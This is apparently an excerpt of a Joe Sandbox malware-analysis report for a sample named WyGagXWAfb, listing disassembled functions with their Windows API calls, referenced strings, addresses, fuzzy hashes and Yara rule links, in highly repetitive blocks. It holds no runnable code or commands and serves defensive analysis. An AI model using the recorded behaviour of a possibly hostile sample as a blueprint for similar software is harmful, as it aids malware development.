CloseHandle.KERNEL32(?), ref: 00B68E94
CloseHandle.KERNEL32(?), ref: 00B68E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00B68EA5
HeapFree.KERNEL32(00000000), ref: 00B68EAC

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: f9ac6ea47df8039ce0f348e628f5d627e9294f6ae5852c97fbe3e0626c16230d
Instruction ID: 03c2aacfcb70c6e7cec32e255679cdd8127d89a59fc648f5e407ed441d36cec5
Opcode Fuzzy Hash: f9ac6ea47df8039ce0f348e628f5d627e9294f6ae5852c97fbe3e0626c16230d
Instruction Fuzzy Hash: 80E0C936004002FBDA011FF1EE0C929BB69FB893327104232F219D2070CF365420DB94

Function 00B88902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B88928
CharUpperBuffW.USER32(?,?), ref: 00B88A37
VariantClear.OLEAUT32(?), ref: 00B88BAF

Part of subcall function 00B77804: VariantInit.OLEAUT32(00000000), ref: 00B77844
Part of subcall function 00B77804: VariantCopy.OLEAUT32(00000000,?), ref: 00B7784D
Part of subcall function 00B77804: VariantClear.OLEAUT32(00000000), ref: 00B77859

Strings

AUTOIT.ERROR, xrefs: 00B88A3D
Incorrect Parameter format, xrefs: 00B88960, 00B88B22

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: f6992286fb2240c9331f92c62202bde81d302c59798ed1d4573788aa4e27f12d
Instruction ID: 463e67da79aa6bb9ea7355f1e682c1611a1dc7afabc04ddfad326fd5a890ea81
Opcode Fuzzy Hash: f6992286fb2240c9331f92c62202bde81d302c59798ed1d4573788aa4e27f12d
Instruction Fuzzy Hash: 07918D71608341DFCB10EF24C48496ABBE4EFC8354F4489AEF89A8B361DB31E945CB52

Function 00B72F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FEC6: _wcscpy.LIBCMT ref: 00B2FEE9

_memset.LIBCMT ref: 00B73077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B730A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B73159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B73187

Strings

0, xrefs: 00B73063

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 0816eb1c68188c06ad2376f345c965592015f0d310d2f5511eba76484068167d
Instruction ID: 77e0ebdf33787a1621613de63490434426fec073d78960fe994c6b8cf2f79d88
Opcode Fuzzy Hash: 0816eb1c68188c06ad2376f345c965592015f0d310d2f5511eba76484068167d
Instruction Fuzzy Hash: 655106716083019FD7259F28D845B6BB7E4EF44B20F548AAEF8A9E3190DB70CE44E752

Function 00B6DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00B6DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B6DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B6DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B6DB8E

Strings

DllGetClassObject, xrefs: 00B6DB01

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: e98abcd9a84b6db772e3a0b1454a11dd4aafbc82c6e131ea0d35a796938f4537
Instruction ID: afae6ee0380f02e1a9363b6998365e662987af99242fd63a27da0595c55a5c99
Opcode Fuzzy Hash: e98abcd9a84b6db772e3a0b1454a11dd4aafbc82c6e131ea0d35a796938f4537
Instruction Fuzzy Hash: 77417171B00208EFDB15CF54D884BAA7BE9EF89350F1580EAAD05DF219D7B5D944CBA0

Function 00B72C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B72CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B72CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00B72D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00BD6890,00000000), ref: 00B72D5A

Strings

0, xrefs: 00B72CA4

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 3b69b3a8d932a9d9075eaa544b91c11689438d07249a9f278de7b52322d13420
Instruction ID: e10562f2ca5aafe5eba7328e29f38dfdb46d72316469c23da75c5151f3359e11
Opcode Fuzzy Hash: 3b69b3a8d932a9d9075eaa544b91c11689438d07249a9f278de7b52322d13420
Instruction Fuzzy Hash: 234163711043029FD724DF24C885B5AB7E8EF85320F1486ADF97997291DB70E905CB92

Function 00B8DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B8DAD9

Part of subcall function 00B179AB: _memmove.LIBCMT ref: 00B179F9

Strings

winapi, xrefs: 00B8DB4A
none, xrefs: 00B8DBB4
stdcall, xrefs: 00B8DB5B
cdecl, xrefs: 00B8DB30

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 49c78eeaba0ee3eee0f6c64f02f9ed38bb443f7d80a02447a127c42358358de1
Instruction ID: cb5cd95e7331422598380b681351d8e75254d0ebb938456401d0ca85a3cd9da4
Opcode Fuzzy Hash: 49c78eeaba0ee3eee0f6c64f02f9ed38bb443f7d80a02447a127c42358358de1
Instruction Fuzzy Hash: 7E31817161061AEFCF10EF54C8919EEB3F5FF05310F5086AAE865A76E1DB31A905CB80

Function 00B69372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

Part of subcall function 00B6B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B6B0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B693F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B69409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00B69439

Part of subcall function 00B17D2C: _memmove.LIBCMT ref: 00B17D66

Strings

ListBox, xrefs: 00B693B5
ComboBox, xrefs: 00B69380

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: b6984565a1f06518cfef44f021c0a72ed3fd847e5465ebf8d167ec200da3c3bd
Instruction ID: c65c858600ac3c692ea41c188ee0bfb69c3131f29aa7451de2e9b2e570e91351
Opcode Fuzzy Hash: b6984565a1f06518cfef44f021c0a72ed3fd847e5465ebf8d167ec200da3c3bd
Instruction Fuzzy Hash: 7B21F671940204BBDB24ABB4DC85DFFB7FCDF45360B1041AAF825972E0DF39494A9610

Function 00B1410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B4D5EC

Part of subcall function 00B17D2C: _memmove.LIBCMT ref: 00B17D66

_memset.LIBCMT ref: 00B1418D
_wcscpy.LIBCMT ref: 00B141E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B141F1

Strings

Line: , xrefs: 00B4D615

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 629fa22d952c346d5b2f3bf73635d0d21be572dda3486bfaae316e8dd1962c67
Instruction ID: a4e6d47e958c10f8823bd6571d7c49f43ad5cf7ccc56f8867f8616fcd927ee1f
Opcode Fuzzy Hash: 629fa22d952c346d5b2f3bf73635d0d21be572dda3486bfaae316e8dd1962c67
Instruction Fuzzy Hash: EF31B171049304AAD725EB60DC46FDBB7ECAF44310F50459EF185931A1EF74A688CBD2

Function 00B81B21 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B81B40
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B81B66
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B81B96
InternetCloseHandle.WININET(00000000), ref: 00B81BDD

Part of subcall function 00B82777: GetLastError.KERNEL32(?,?,00B81B0B,00000000,00000000,00000001), ref: 00B8278C
Part of subcall function 00B82777: SetEvent.KERNEL32(?,?,00B81B0B,00000000,00000000,00000001), ref: 00B827A1

Strings

, xrefs: 00B81B87

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 6f88d10035012cbd6bfd9457e8e420b0acc5843aaa6447ceeecdd0d637c00d80
Instruction ID: 4dd2601288214472dc0e2274b63267be340e73223c05a997a9efaeb99421d85b
Opcode Fuzzy Hash: 6f88d10035012cbd6bfd9457e8e420b0acc5843aaa6447ceeecdd0d637c00d80
Instruction Fuzzy Hash: CC21FDB1601208BFEB11AF688CC5EBF77ECEB48B54F1004AAF405E3220EA249D069760

Function 00B96656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B11D73
Part of subcall function 00B11D35: GetStockObject.GDI32(00000011), ref: 00B11D87
Part of subcall function 00B11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B11D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B966D0
LoadLibraryW.KERNEL32(?), ref: 00B966D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B966EC
DestroyWindow.USER32(?), ref: 00B966F4

Strings

SysAnimate32, xrefs: 00B966AB

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: ccd4e9ceff2e68b62d48269d4b1175ab2bfde933a52d674734bdedeb1f372359
Instruction ID: f103986889cecba49fc2b073283003f94208236e17ed7aff05c70c04dc17c262
Opcode Fuzzy Hash: ccd4e9ceff2e68b62d48269d4b1175ab2bfde933a52d674734bdedeb1f372359
Instruction Fuzzy Hash: C7218B71200206ABEF104FA4EC80EFB77EDEB59368F20467AF910931A0DB718C519760

Function 00B7703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00B7705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B77091
GetStdHandle.KERNEL32(0000000C), ref: 00B770A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B770DD

Strings

nul, xrefs: 00B770D8

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: c80b77645e5aa60372d853844308bc1da03eb93b312d32c9e81ca2112a851ab8
Instruction ID: 90f71ae5195c0be18fc2b64f38e719ca4a9a7567dc5de56075524adcc6f76f87
Opcode Fuzzy Hash: c80b77645e5aa60372d853844308bc1da03eb93b312d32c9e81ca2112a851ab8
Instruction Fuzzy Hash: 0F2141745442099BDF209F78DC45AAA77E4FF44720F20865AF8B5D72D0DB7198508B50

Function 00B7710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B7712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B7715D
GetStdHandle.KERNEL32(000000F6), ref: 00B7716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B771A8

Strings

nul, xrefs: 00B771A3

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 6fd0b9a812133c90c34bdd0a7453f6f8646423e4939a7aa1cd8e478a0943fa87
Instruction ID: 6ef26ebcb9c8d23e942cbefb0f7423c6313301d7ef55465f8d9b05e4ea6853e3
Opcode Fuzzy Hash: 6fd0b9a812133c90c34bdd0a7453f6f8646423e4939a7aa1cd8e478a0943fa87
Instruction Fuzzy Hash: DD21C4715442069BDF209F689C04BA977E8EF45730F608699FCB4E72D0DF709841CB60

Function 00B7AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B7AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B7AF13
__swprintf.LIBCMT ref: 00B7AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,00B9F910), ref: 00B7AF6A

Strings

%lu, xrefs: 00B7AF26

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 716513c7300c73101168257a419e3cf28cea7ebdd4e4d600333ab33b8b725928
Instruction ID: 0fdcc48988515010bbacaca3c088f4e553b7fa4541b7ae5825d401d4d7bd64a4
Opcode Fuzzy Hash: 716513c7300c73101168257a419e3cf28cea7ebdd4e4d600333ab33b8b725928
Instruction Fuzzy Hash: 87214130A00149AFCB10EF64C985EEE7BF8EF89714B1040A9F909EB251DB31EA45CB61

Function 00B6A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17D2C: _memmove.LIBCMT ref: 00B17D66

Part of subcall function 00B6A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B6A399
Part of subcall function 00B6A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B6A3AC
Part of subcall function 00B6A37C: GetCurrentThreadId.KERNEL32 ref: 00B6A3B3
Part of subcall function 00B6A37C: AttachThreadInput.USER32(00000000), ref: 00B6A3BA

GetFocus.USER32 ref: 00B6A554

Part of subcall function 00B6A3C5: GetParent.USER32(?), ref: 00B6A3D3

GetClassNameW.USER32(?,?,00000100), ref: 00B6A59D
EnumChildWindows.USER32(?,00B6A615), ref: 00B6A5C5
__swprintf.LIBCMT ref: 00B6A5DF

Strings

%s%d, xrefs: 00B6A5D9

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 2353498c6e801ac31cb7f483f4dbc1332151526870cf8ffdb065d2bd2478cf56
Instruction ID: c82c52c04c3681f96b77a765b30e271c0ea92c4f16e8726b1042b1fc2d52bd2e
Opcode Fuzzy Hash: 2353498c6e801ac31cb7f483f4dbc1332151526870cf8ffdb065d2bd2478cf56
Instruction Fuzzy Hash: E911A2716402097BDF107FA4DD85FEA77F8AF48710F0440F5B908BA152CA7499458F79

Function 00B72017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B72048

Strings

EXISTS, xrefs: 00B72070
KEYS, xrefs: 00B7205F
REMOVE, xrefs: 00B7204E
APPEND, xrefs: 00B72081

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 15171e0ea935ce707144adfa2f57b54aae486b2e2f8b269a6cf0b77d9ef70eec
Instruction ID: 8c4df109d2cadaf84b17622d6664ffd360d08e68d98aaac61d027b667a59ab84
Opcode Fuzzy Hash: 15171e0ea935ce707144adfa2f57b54aae486b2e2f8b269a6cf0b77d9ef70eec
Instruction Fuzzy Hash: 6E115B35910109DFCF00EFA4D9919EEB7F4FF16308F5084E9D8A5A7292EB326906CB50

Function 00B8EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B8EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B8EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B8F07E
CloseHandle.KERNEL32(?), ref: 00B8F0FF

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: fc8916f4042f6c5c0c13c41ed9616f9a90830d64d139aeab9ae73d359bf5d2fb
Instruction ID: 2f30f71ee9e16a8a7075b03c0a2389e7ed38b9718b62efc9aadd498842848340
Opcode Fuzzy Hash: fc8916f4042f6c5c0c13c41ed9616f9a90830d64d139aeab9ae73d359bf5d2fb
Instruction Fuzzy Hash: 498162716143019FD720EF24C896F6AB7E5EF48720F54886DF599DB292DB70AC40CB91

Function 00B3564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B356AB
_memcpy_s.LIBCMT ref: 00B3571D
__read_nolock.LIBCMT ref: 00B3577B
__filbuf.LIBCMT ref: 00B3579E
_memset.LIBCMT ref: 00B357E2

Part of subcall function 00B38D68: __getptd_noexit.LIBCMT ref: 00B38D68

Memory Dump Source

